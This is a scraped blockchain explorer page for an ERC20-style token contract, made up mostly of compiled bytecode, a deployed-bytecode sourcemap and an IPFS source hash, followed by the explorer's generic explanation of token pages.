a01b03949094166040830152506060015292915050565b600060208284031215611e4157600080fd5b8151611c8881611d09565b600181811c90821680611e6057607f821691505b602082108103611e8057634e487b7160e01b600052602260045260246000fd5b50919050565b600080600060608486031215611e9b57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b8082018082111561098457610984611eb4565b600060208284031215611eef57600080fd5b5051919050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761098457610984611eb4565b600082611fb257634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561098457610984611eb4565b85815284602082015260a060408201526000611fe960a0830186611db6565b6001600160a01b039490941660608301525060800152939250505056fea26469706673582212204a196c7779d0e39644bb2fd8837170a3358047c67924b5af46e1b5fc031334d464736f6c63430008130033
Deployed Bytecode Sourcemap
26647:8388:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26860:64;;;;;;;;;;-1:-1:-1;26860:64:0;;;;-1:-1:-1;;;;;26860:64:0;;;;;;-1:-1:-1;;;;;178:32:1;;;160:51;;148:2;133:18;26860:64:0;;;;;;;;27542:50;;;;;;;;;;;;;;;;;;;368:25:1;;;356:2;341:18;27542:50:0;222:177:1;33941:602:0;;;;;;;;;;-1:-1:-1;33941:602:0;;;;;:::i;:::-;;:::i;:::-;;9394:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;11754:201::-;;;;;;;;;;-1:-1:-1;11754:201:0;;;;;:::i;:::-;;:::i;:::-;;;1578:14:1;;1571:22;1553:41;;1541:2;1526:18;11754:201:0;1413:187:1;27308:45:0;;;;;;;;;;-1:-1:-1;27308:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;31478:481;;;:::i;27109:51::-;;;;;;;;;;;;;;;10523:108;;;;;;;;;;-1:-1:-1;10611:12:0;;10523:108;;12535:261;;;;;;;;;;-1:-1:-1;12535:261:0;;;;;:::i;:::-;;:::i;10365:93::-;;;;;;;;;;-1:-1:-1;10365:93:0;;10448:2;2695:36:1;;2683:2;2668:18;10365:93:0;2553:184:1;27639:32:0;;;;;;;;;;;;;;;;13205:238;;;;;;;;;;-1:-1:-1;13205:238:0;;;;;:::i;:::-;;:::i;27601:31::-;;;;;;;;;;;;;;;;27204:43;;;;;;;;;;-1:-1:-1;27204:43:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;27167:28;;;;;;;;;;-1:-1:-1;27167:28:0;;;;-1:-1:-1;;;;;27167:28:0;;;34588:185;;;;;;;;;;-1:-1:-1;34588:185:0;;;;;:::i;:::-;;:::i;33780:153::-;;;;;;;;;;;;;:::i;32817:176::-;;;;;;;;;;;;;:::i;10694:127::-;;;;;;;;;;-1:-1:-1;10694:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;10795:18:0;10768:7;10795:18;;;;;;;;;;;;10694:127;2820:103;;;;;;;;;;;;;:::i;27254:47::-;;;;;;;;;;-1:-1:-1;27254:47:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;27424:52;;;;;;;;;;;;;;;;27798:29;;;;;;;;;;;;;;;;2179:87;;;;;;;;;;-1:-1:-1;2252:6:0;;-1:-1:-1;;;;;2252:6:0;2179:87;;9613:104;;;;;;;;;;;;;:::i;34919:113::-;;;;;;;;;;;;;:::i;13946:436::-;;;;;;;;;;-1:-1:-1;13946:436:0;;;;;:::i;:::-;;:::i;11027:193::-;;;;;;;;;;-1:-1:-1;11027:193:0;;;;;:::i;:::-;;:::i;27483:52::-;;;;;;;;;;;;;;;;11283:151;;;;;;;;;;-1:-1:-1;11283:151:0;;;;;:::i;:::-;;:::i;34785:126::-;;;;;;;;;;-1:-1:-1;34785:126:0;;;;;:::i;:::-;;:::i;3078:201::-;;;;;;;;;;-1:-1:-1;3078:201:0;;;;;:::i;:::-;;:::i;26970:31::-;;;;;;;;;;-1:-1:-1;26970:31:0;;;;-1:-1:-1;;;26970:31:0;;;;;;;;;;;;;:::i;33941:602::-;34037:16;;;34051:1;34037:16;;;;;;;;34013:21;;34037:16;;;;;;;;;;-1:-1:-1;34037:16:0;34013:40;;34074:15;-1:-1:-1;;;;;34074:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34064:4;34069:1;34064:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;34064:32:0;;;-1:-1:-1;;;;;34064:32:0;;;;;34125:4;34107;34112:1;34107:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;34107:23:0;;;-1:-1:-1;;;;;34107:23:0;;;;;34141:12;34163:4;34168:1;34163:7;;;;;;;;:::i;:::-;;;;;;;;;;;;34201:10;34189:23;;;;:11;:23;;;;;;;;34163:7;;-1:-1:-1;34189:23:0;;34184:352;;34229:195;;-1:-1:-1;;;34229:195:0;;-1:-1:-1;;;;;34229:15:0;:66;;;;34303:6;;34229:195;;34330:1;;34350:4;;34373:2;;34394:15;;34229:195;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34184:352;;;34443:27;34459:2;34463:6;34443:15;:27::i;:::-;34485:5;-1:-1:-1;;;;;34485:18:0;;34504:2;34508:4;34513:1;34508:7;;;;;;;;:::i;:::-;;;;;;;;;;;34485:39;;-1:-1:-1;;;;;;34485:39:0;;;;;;;-1:-1:-1;;;;;5885:15:1;;;34485:39:0;;;5867:34:1;5937:15;;5917:18;;;5910:43;5969:18;;;5962:34;;;5802:18;;34485:39:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34184:352;34002:541;;33941:602;;:::o;9394:100::-;9448:13;9481:5;9474:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9394:100;:::o;11754:201::-;11837:4;801:10;11893:32;801:10;11909:7;11918:6;11893:8;:32::i;:::-;11943:4;11936:11;;;11754:201;;;;;:::o;31478:481::-;2065:13;:11;:13::i;:::-;31572:15:::1;-1:-1:-1::0;;;;;31572:23:0::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;31554:55:0::1;;31618:4;31625:15;-1:-1:-1::0;;;;;31625:20:0::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31554:94;::::0;-1:-1:-1;;;;;;31554:94:0::1;::::0;;;;;;-1:-1:-1;;;;;6872:15:1;;;31554:94:0::1;::::0;::::1;6854:34:1::0;6924:15;;6904:18;;;6897:43;6789:18;;31554:94:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31538:13;:110:::0;;-1:-1:-1;;;;;;31538:110:0::1;-1:-1:-1::0;;;;;31538:110:0;;;::::1;::::0;;;::::1;::::0;;31659:68:::1;31676:4;31691:15;-1:-1:-1::0;;31659:8:0::1;:68::i;:::-;31738:15;-1:-1:-1::0;;;;;31738:31:0::1;;31777:9;31810:4;31830:24;31848:4;-1:-1:-1::0;;;;;10795:18:0;10768:7;10795:18;;;;;;;;;;;;10694:127;31830:24:::1;31869:1;31886::::0;31903:7:::1;2252:6:::0;;-1:-1:-1;;;;;2252:6:0;;2179:87;31903:7:::1;31738:213;::::0;::::1;::::0;;;-1:-1:-1;;;;;;31738:213:0;;;-1:-1:-1;;;;;7310:15:1;;;31738:213:0::1;::::0;::::1;7292:34:1::0;7342:18;;;7335:34;;;;7385:18;;;7378:34;;;;7428:18;;;7421:34;7492:15;;;7471:19;;;7464:44;31925:15:0::1;7524:19:1::0;;;7517:35;7226:19;;31738:213:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;31478:481::o:0;12535:261::-;12632:4;801:10;12690:38;12706:4;801:10;12721:6;12690:15;:38::i;:::-;12739:27;12749:4;12755:2;12759:6;12739:9;:27::i;:::-;-1:-1:-1;12784:4:0;;12535:261;-1:-1:-1;;;;12535:261:0:o;13205:238::-;13293:4;801:10;13349:64;801:10;13365:7;13402:10;13374:25;801:10;13365:7;13374:9;:25::i;:::-;:38;;;;:::i;:::-;13349:8;:64::i;34588:185::-;2065:13;:11;:13::i;:::-;34694:7:::1;::::0;34716:38:::1;::::0;-1:-1:-1;;;34716:38:0;;34748:4:::1;34716:38;::::0;::::1;160:51:1::0;-1:-1:-1;;;;;34657:22:0;;::::1;::::0;::::1;::::0;34694:7;::::1;::::0;34657:22;;34716:23:::1;::::0;133:18:1;;34716:38:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34657:108;::::0;-1:-1:-1;;;;;;34657:108:0::1;::::0;;;;;;-1:-1:-1;;;;;8517:32:1;;;34657:108:0::1;::::0;::::1;8499:51:1::0;8566:18;;;8559:34;8472:18;;34657:108:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34588:185:::0;:::o;33780:153::-;33841:7;;33859:14;;33833:41;;33816:4;;-1:-1:-1;;;;;33841:7:0;;33833:41;;;;;33816:4;33833:41;33816:4;33833:41;33859:14;33841:7;33833:41;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;33902:1:0;33885:14;:18;33921:4;;33780:153::o;32817:176::-;2065:13;:11;:13::i;:::-;32878:14:::1;::::0;-1:-1:-1;;;32878:14:0;::::1;;;32877:15;32869:54;;;::::0;-1:-1:-1;;;32869:54:0;;8806:2:1;32869:54:0::1;::::0;::::1;8788:21:1::0;8845:2;8825:18;;;8818:30;8884:28;8864:18;;;8857:56;8930:18;;32869:54:0::1;;;;;;;;;32934:14;:21:::0;;-1:-1:-1;;;;32966:19:0;-1:-1:-1;;;32966:19:0;;;32817:176::o;2820:103::-;2065:13;:11;:13::i;:::-;2885:30:::1;2912:1;2885:18;:30::i;:::-;2820:103::o:0;9613:104::-;9669:13;9702:7;9695:14;;;;;:::i;34919:113::-;2065:13;:11;:13::i;:::-;27408:9:::1;34976:11;:21:::0;;;34999:15:::1;:25:::0;34919:113::o;13946:436::-;14039:4;801:10;14039:4;14122:25;801:10;14139:7;14122:9;:25::i;:::-;14095:52;;14186:15;14166:16;:35;;14158:85;;;;-1:-1:-1;;;14158:85:0;;9161:2:1;14158:85:0;;;9143:21:1;9200:2;9180:18;;;9173:30;9239:34;9219:18;;;9212:62;-1:-1:-1;;;9290:18:1;;;9283:35;9335:19;;14158:85:0;8959:401:1;14158:85:0;14279:60;14288:5;14295:7;14323:15;14304:16;:34;14279:8;:60::i;11027:193::-;11106:4;801:10;11162:28;801:10;11179:2;11183:6;11162:9;:28::i;11283:151::-;-1:-1:-1;;;;;11399:18:0;;;11372:7;11399:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11283:151::o;34785:126::-;2065:13;:11;:13::i;:::-;-1:-1:-1;;;;;34872:21:0;;;::::1;;::::0;;;:15:::1;:21;::::0;;;;:31;;-1:-1:-1;;34872:31:0::1;::::0;::::1;;::::0;;;::::1;::::0;;34785:126::o;3078:201::-;2065:13;:11;:13::i;:::-;-1:-1:-1;;;;;3167:22:0;::::1;3159:73;;;::::0;-1:-1:-1;;;3159:73:0;;9567:2:1;3159:73:0::1;::::0;::::1;9549:21:1::0;9606:2;9586:18;;;9579:30;9645:34;9625:18;;;9618:62;-1:-1:-1;;;9696:18:1;;;9689:36;9742:19;;3159:73:0::1;9365:402:1::0;3159:73:0::1;3243:28;3262:8;3243:18;:28::i;:::-;3078:201:::0;:::o;19003:361::-;19113:4;19089:13;19156:25;19113:4;19173:7;19156:9;:25::i;:::-;19129:52;;-1:-1:-1;;19196:16:0;:37;19192:165;;19279:51;19288:7;19297:5;19323:6;19304:16;:25;17939:346;-1:-1:-1;;;;;18041:19:0;;18033:68;;;;-1:-1:-1;;;18033:68:0;;9974:2:1;18033:68:0;;;9956:21:1;10013:2;9993:18;;;9986:30;10052:34;10032:18;;;10025:62;-1:-1:-1;;;10103:18:1;;;10096:34;10147:19;;18033:68:0;9772:400:1;18033:68:0;-1:-1:-1;;;;;18120:21:0;;18112:68;;;;-1:-1:-1;;;18112:68:0;;10379:2:1;18112:68:0;;;10361:21:1;10418:2;10398:18;;;10391:30;10457:34;10437:18;;;10430:62;-1:-1:-1;;;10508:18:1;;;10501:32;10550:19;;18112:68:0;10177:398:1;18112:68:0;-1:-1:-1;;;;;18193:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18245:32;;368:25:1;;;18245:32:0;;341:18:1;18245:32:0;;;;;;;17939:346;;;:::o;2344:132::-;2252:6;;-1:-1:-1;;;;;2252:6:0;801:10;2408:23;2400:68;;;;-1:-1:-1;;;2400:68:0;;10782:2:1;2400:68:0;;;10764:21:1;;;10801:18;;;10794:30;10860:34;10840:18;;;10833:62;10912:18;;2400:68:0;10580:356:1;18576:419:0;18677:24;18704:25;18714:5;18721:7;18704:9;:25::i;:::-;18677:52;;-1:-1:-1;;18744:16:0;:37;18740:248;;18826:6;18806:16;:26;;18798:68;;;;-1:-1:-1;;;18798:68:0;;11143:2:1;18798:68:0;;;11125:21:1;11182:2;11162:18;;;11155:30;11221:31;11201:18;;;11194:59;11270:18;;18798:68:0;10941:353:1;18798:68:0;18910:51;18919:5;18926:7;18954:6;18935:16;:25;18910:8;:51::i;28688:2782::-;-1:-1:-1;;;;;28820:18:0;;28812:68;;;;-1:-1:-1;;;28812:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;28899:16:0;;28891:64;;;;-1:-1:-1;;;28891:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;28971:17:0;;;;;;:11;:17;;;;;;;;28970:18;:38;;;;-1:-1:-1;;;;;;28993:15:0;;;;;;:11;:15;;;;;;;;28992:16;28970:38;28966:117;;;29033:14;;-1:-1:-1;;;29033:14:0;;;;29025:46;;;;-1:-1:-1;;;29025:46:0;;12311:2:1;29025:46:0;;;12293:21:1;12350:2;12330:18;;;12323:30;-1:-1:-1;;;12369:18:1;;;12362:49;12428:18;;29025:46:0;12109:343:1;29025:46:0;-1:-1:-1;;;;;29100:21:0;;;;;;:15;:21;;;;;;;;29099:22;:46;;;;-1:-1:-1;;;;;;29126:19:0;;;;;;:15;:19;;;;;;;;29125:20;29099:46;29095:424;;;29173:13;;-1:-1:-1;;;;;29167:19:0;;;29173:13;;29167:19;29163:345;;29225:11;;29215:6;:21;;29207:95;;;;-1:-1:-1;;;29207:95:0;;12659:2:1;29207:95:0;;;12641:21:1;12698:2;12678:18;;;12671:30;12737:34;12717:18;;;12710:62;12808:31;12788:18;;;12781:59;12857:19;;29207:95:0;12457:425:1;29207:95:0;29379:15;;-1:-1:-1;;;;;10795:18:0;;10768:7;10795:18;;;;;;;;;;;29352:22;;:6;:22;:::i;:::-;29351:43;;29321:171;;;;-1:-1:-1;;;29321:171:0;;13089:2:1;29321:171:0;;;13071:21:1;13128:2;13108:18;;;13101:30;13167:34;13147:18;;;13140:62;-1:-1:-1;;;13218:18:1;;;13211:52;13280:19;;29321:171:0;12887:418:1;29321:171:0;-1:-1:-1;;;;;29578:17:0;;29531:22;29578:17;;;:11;:17;;;;;;29556:6;;29578:17;;29577:18;:38;;;;-1:-1:-1;;;;;;29600:15:0;;;;;;:11;:15;;;;;;;;29599:16;29577:38;29573:1834;;;29645:13;;-1:-1:-1;;;;;29637:21:0;;;29645:13;;29637:21;;:44;;-1:-1:-1;29668:13:0;;-1:-1:-1;;;;;29662:19:0;;;29668:13;;29662:19;29637:44;29632:1764;;;29735:11;;29725:6;:21;;29717:91;;;;-1:-1:-1;;;29717:91:0;;13512:2:1;29717:91:0;;;13494:21:1;13551:2;13531:18;;;13524:30;13590:34;13570:18;;;13563:62;13661:27;13641:18;;;13634:55;13706:19;;29717:91:0;13310:421:1;29717:91:0;29853:13;;-1:-1:-1;;;;;29853:21:0;;;:13;;:21;:45;;;;-1:-1:-1;;;;;;29879:19:0;;;;;;:15;:19;;;;;;;;29878:20;29853:45;:70;;;;-1:-1:-1;;;;;;29902:21:0;;29918:4;29902:21;;29853:70;29827:473;;;29988:14;29972:12;;-1:-1:-1;;;29972:12:0;;;;:30;;;;;;;;:::i;:::-;;29968:111;;-1:-1:-1;;;;;30031:17:0;;;;;;:13;:17;;;;;:24;;-1:-1:-1;;30031:24:0;30051:4;30031:24;;;29968:111;30103:17;30149:3;30133:12;;30124:6;:21;;;;:::i;:::-;30123:29;;;;:::i;:::-;30103:49;;30175:47;30191:4;30205;30212:9;30175:15;:47::i;:::-;30262:18;30271:9;30262:6;:18;:::i;:::-;30245:35;;29943:357;29827:473;30346:13;;-1:-1:-1;;;;;30346:19:0;;;:13;;:19;:45;;;;-1:-1:-1;;;;;;30370:21:0;;;;;;:15;:21;;;;;;;;30369:22;30346:45;:69;;;;-1:-1:-1;;;;;;30396:19:0;;30410:4;30396:19;;30346:69;:85;;;;-1:-1:-1;30419:12:0;;-1:-1:-1;;;30419:12:0;;;;30346:85;:103;;;;-1:-1:-1;30436:13:0;;-1:-1:-1;;;30436:13:0;;;;30435:14;30346:103;30320:695;;;30532:13;;-1:-1:-1;;;;;30572:19:0;;30514:15;30572:19;;;:13;:19;;;;;;;;:27;;:19;:27;30568:103;;-1:-1:-1;30638:9:0;;30568:103;30695:13;:20;;-1:-1:-1;;;;30695:20:0;-1:-1:-1;;;30695:20:0;;;30738:16;:14;:16::i;:::-;30777:13;:21;;-1:-1:-1;;;;30777:21:0;;;30793:5;30864:3;30844:16;30853:7;30844:6;:16;:::i;:::-;30843:24;;;;:::i;:::-;30823:44;;30890:47;30906:4;30920;30927:9;30890:15;:47::i;:::-;30977:18;30986:9;30977:6;:18;:::i;:::-;30960:35;;30469:546;;30320:695;29632:1764;;;-1:-1:-1;;;;;31094:19:0;;;;;;:13;:19;;;;;;;;:27;;:19;:27;:50;;;;-1:-1:-1;31125:13:0;;-1:-1:-1;;;;;31125:19:0;;;:13;;:19;;31094:50;31068:313;;;31187:17;31230:3;31217:9;;31208:6;:18;;;;:::i;:::-;31207:26;;;;:::i;:::-;31187:46;;31256:47;31272:4;31286;31293:9;31256:15;:47::i;:::-;31343:18;31352:9;31343:6;:18;:::i;:::-;31326:35;;31164:217;31068:313;31421:41;31437:4;31443:2;31447:14;31421:15;:41::i;3439:191::-;3532:6;;;-1:-1:-1;;;;;3549:17:0;;;-1:-1:-1;;;;;;3549:17:0;;;;;;;3582:40;;3532:6;;;3549:17;3532:6;;3582:40;;3513:16;;3582:40;3502:128;3439:191;:::o;14852:806::-;-1:-1:-1;;;;;14949:18:0;;14941:68;;;;-1:-1:-1;;;14941:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15028:16:0;;15020:64;;;;-1:-1:-1;;;15020:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15170:15:0;;15148:19;15170:15;;;;;;;;;;;15204:21;;;;15196:72;;;;-1:-1:-1;;;15196:72:0;;14466:2:1;15196:72:0;;;14448:21:1;14505:2;14485:18;;;14478:30;14544:34;14524:18;;;14517:62;-1:-1:-1;;;14595:18:1;;;14588:36;14641:19;;15196:72:0;14264:402:1;15196:72:0;-1:-1:-1;;;;;15304:15:0;;;:9;:15;;;;;;;;;;;15322:20;;;15304:38;;15522:13;;;;;;;;;;:23;;;;;;15574:26;;368:25:1;;;15522:13:0;;15574:26;;341:18:1;15574:26:0;;;;;;;15613:37;31478:481;31967:842;32035:4;10768:7;10795:18;;;;;;;;;;;32045:1;32017:29;32013:68;;31967:842::o;32013:68::-;32185:4;32091:19;10795:18;;;;;;;;;;;;32297:7;;-1:-1:-1;;;;;32297:7:0;10795:18;;;;;;32374:13;;32230:21;;10795:18;32091:19;;32351:36;;32347:444;;;32424:21;32408:37;;32464:42;32482:20;32504:1;32464:17;:42::i;:::-;32539:37;32563:13;32539:21;:37;:::i;:::-;32525:51;;32612:13;;32599:10;:26;32595:133;;;32682:7;:25;;32706:1;32682:25;;;32692:11;32682:25;32667:41;;:11;:41;:::i;:::-;32650:14;:58;32595:133;32764:11;32746:14;;:29;;;;;;;:::i;:::-;;;;-1:-1:-1;;32121:681:0;;;;32002:807;31967:842::o;33184:588::-;33325:16;;;33339:1;33325:16;;;;;;;;33301:21;;33325:16;;;;;;;;;;-1:-1:-1;33325:16:0;33301:40;;33370:4;33352;33357:1;33352:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;33352:23:0;;;-1:-1:-1;;;;;33352:23:0;;;;;33396:15;-1:-1:-1;;;;;33396:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;33386:4;33391:1;33386:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;33386:32:0;;;:7;;;;;;;;;:32;33431:111;;-1:-1:-1;;;33431:111:0;;33483:15;8517:32:1;;;33431:111:0;;;8499:51:1;-1:-1:-1;;8566:18:1;;;8559:34;33446:4:0;;33431:29;;8472:18:1;;33431:111:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;33555:209:0;;-1:-1:-1;;;33555:209:0;;-1:-1:-1;;;;;33555:15:0;:66;;;;:209;;33636:11;;33662:14;;33691:4;;33718;;33738:15;;33555:209;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33290:482;33184:588;;:::o;404:131:1:-;-1:-1:-1;;;;;479:31:1;;469:42;;459:70;;525:1;522;515:12;540:315;608:6;616;669:2;657:9;648:7;644:23;640:32;637:52;;;685:1;682;675:12;637:52;724:9;711:23;743:31;768:5;743:31;:::i;:::-;793:5;845:2;830:18;;;;817:32;;-1:-1:-1;;;540:315:1:o;860:548::-;972:4;1001:2;1030;1019:9;1012:21;1062:6;1056:13;1105:6;1100:2;1089:9;1085:18;1078:34;1130:1;1140:140;1154:6;1151:1;1148:13;1140:140;;;1249:14;;;1245:23;;1239:30;1215:17;;;1234:2;1211:26;1204:66;1169:10;;1140:140;;;1144:3;1329:1;1324:2;1315:6;1304:9;1300:22;1296:31;1289:42;1399:2;1392;1388:7;1383:2;1375:6;1371:15;1367:29;1356:9;1352:45;1348:54;1340:62;;;;860:548;;;;:::o;1605:247::-;1664:6;1717:2;1705:9;1696:7;1692:23;1688:32;1685:52;;;1733:1;1730;1723:12;1685:52;1772:9;1759:23;1791:31;1816:5;1791:31;:::i;:::-;1841:5;1605:247;-1:-1:-1;;;1605:247:1:o;2092:456::-;2169:6;2177;2185;2238:2;2226:9;2217:7;2213:23;2209:32;2206:52;;;2254:1;2251;2244:12;2206:52;2293:9;2280:23;2312:31;2337:5;2312:31;:::i;:::-;2362:5;-1:-1:-1;2419:2:1;2404:18;;2391:32;2432:33;2391:32;2432:33;:::i;:::-;2092:456;;2484:7;;-1:-1:-1;;;2538:2:1;2523:18;;;;2510:32;;2092:456::o;2742:388::-;2810:6;2818;2871:2;2859:9;2850:7;2846:23;2842:32;2839:52;;;2887:1;2884;2877:12;2839:52;2926:9;2913:23;2945:31;2970:5;2945:31;:::i;:::-;2995:5;-1:-1:-1;3052:2:1;3037:18;;3024:32;3065:33;3024:32;3065:33;:::i;:::-;3117:7;3107:17;;;2742:388;;;;;:::o;3135:118::-;3221:5;3214:13;3207:21;3200:5;3197:32;3187:60;;3243:1;3240;3233:12;3258:382;3323:6;3331;3384:2;3372:9;3363:7;3359:23;3355:32;3352:52;;;3400:1;3397;3390:12;3352:52;3439:9;3426:23;3458:31;3483:5;3458:31;:::i;:::-;3508:5;-1:-1:-1;3565:2:1;3550:18;;3537:32;3578:30;3537:32;3578:30;:::i;3645:127::-;3706:10;3701:3;3697:20;3694:1;3687:31;3737:4;3734:1;3727:15;3761:4;3758:1;3751:15;3777:344;3925:2;3910:18;;3958:1;3947:13;;3937:144;;4003:10;3998:3;3994:20;3991:1;3984:31;4038:4;4035:1;4028:15;4066:4;4063:1;4056:15;3937:144;4090:25;;;3777:344;:::o;4258:251::-;4328:6;4381:2;4369:9;4360:7;4356:23;4352:32;4349:52;;;4397:1;4394;4387:12;4349:52;4429:9;4423:16;4448:31;4473:5;4448:31;:::i;4514:127::-;4575:10;4570:3;4566:20;4563:1;4556:31;4606:4;4603:1;4596:15;4630:4;4627:1;4620:15;4646:461;4699:3;4737:5;4731:12;4764:6;4759:3;4752:19;4790:4;4819:2;4814:3;4810:12;4803:19;;4856:2;4849:5;4845:14;4877:1;4887:195;4901:6;4898:1;4895:13;4887:195;;;4966:13;;-1:-1:-1;;;;;4962:39:1;4950:52;;5022:12;;;;5057:15;;;;4998:1;4916:9;4887:195;;;-1:-1:-1;5098:3:1;;4646:461;-1:-1:-1;;;;;4646:461:1:o;5112:510::-;5383:6;5372:9;5365:25;5426:3;5421:2;5410:9;5406:18;5399:31;5346:4;5447:57;5499:3;5488:9;5484:19;5476:6;5447:57;:::i;:::-;-1:-1:-1;;;;;5540:32:1;;;;5535:2;5520:18;;5513:60;-1:-1:-1;5604:2:1;5589:18;5582:34;5439:65;5112:510;-1:-1:-1;;5112:510:1:o;6007:245::-;6074:6;6127:2;6115:9;6106:7;6102:23;6098:32;6095:52;;;6143:1;6140;6133:12;6095:52;6175:9;6169:16;6194:28;6216:5;6194:28;:::i;6257:380::-;6336:1;6332:12;;;;6379;;;6400:61;;6454:4;6446:6;6442:17;6432:27;;6400:61;6507:2;6499:6;6496:14;6476:18;6473:38;6470:161;;6553:10;6548:3;6544:20;6541:1;6534:31;6588:4;6585:1;6578:15;6616:4;6613:1;6606:15;6470:161;;6257:380;;;:::o;7563:306::-;7651:6;7659;7667;7720:2;7708:9;7699:7;7695:23;7691:32;7688:52;;;7736:1;7733;7726:12;7688:52;7765:9;7759:16;7749:26;;7815:2;7804:9;7800:18;7794:25;7784:35;;7859:2;7848:9;7844:18;7838:25;7828:35;;7563:306;;;;;:::o;7874:127::-;7935:10;7930:3;7926:20;7923:1;7916:31;7966:4;7963:1;7956:15;7990:4;7987:1;7980:15;8006:125;8071:9;;;8092:10;;;8089:36;;;8105:18;;:::i;8136:184::-;8206:6;8259:2;8247:9;8238:7;8234:23;8230:32;8227:52;;;8275:1;8272;8265:12;8227:52;-1:-1:-1;8298:16:1;;8136:184;-1:-1:-1;8136:184:1:o;11299:401::-;11501:2;11483:21;;;11540:2;11520:18;;;11513:30;11579:34;11574:2;11559:18;;11552:62;-1:-1:-1;;;11645:2:1;11630:18;;11623:35;11690:3;11675:19;;11299:401::o;11705:399::-;11907:2;11889:21;;;11946:2;11926:18;;;11919:30;11985:34;11980:2;11965:18;;11958:62;-1:-1:-1;;;12051:2:1;12036:18;;12029:33;12094:3;12079:19;;11705:399::o;13736:168::-;13809:9;;;13840;;13857:15;;;13851:22;;13837:37;13827:71;;13878:18;;:::i;13909:217::-;13949:1;13975;13965:132;;14019:10;14014:3;14010:20;14007:1;14000:31;14054:4;14051:1;14044:15;14082:4;14079:1;14072:15;13965:132;-1:-1:-1;14111:9:1;;13909:217::o;14131:128::-;14198:9;;;14219:11;;;14216:37;;;14233:18;;:::i;14671:574::-;14962:6;14951:9;14944:25;15005:6;15000:2;14989:9;14985:18;14978:34;15048:3;15043:2;15032:9;15028:18;15021:31;14925:4;15069:57;15121:3;15110:9;15106:19;15098:6;15069:57;:::i;:::-;-1:-1:-1;;;;;15162:32:1;;;;15157:2;15142:18;;15135:60;-1:-1:-1;15226:3:1;15211:19;15204:35;15061:65;14671:574;-1:-1:-1;;;14671:574:1:o
Swarm Source
ipfs://4a196c7779d0e39644bb2fd8837170a3358047c67924b5af46e1b5fc031334d4
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.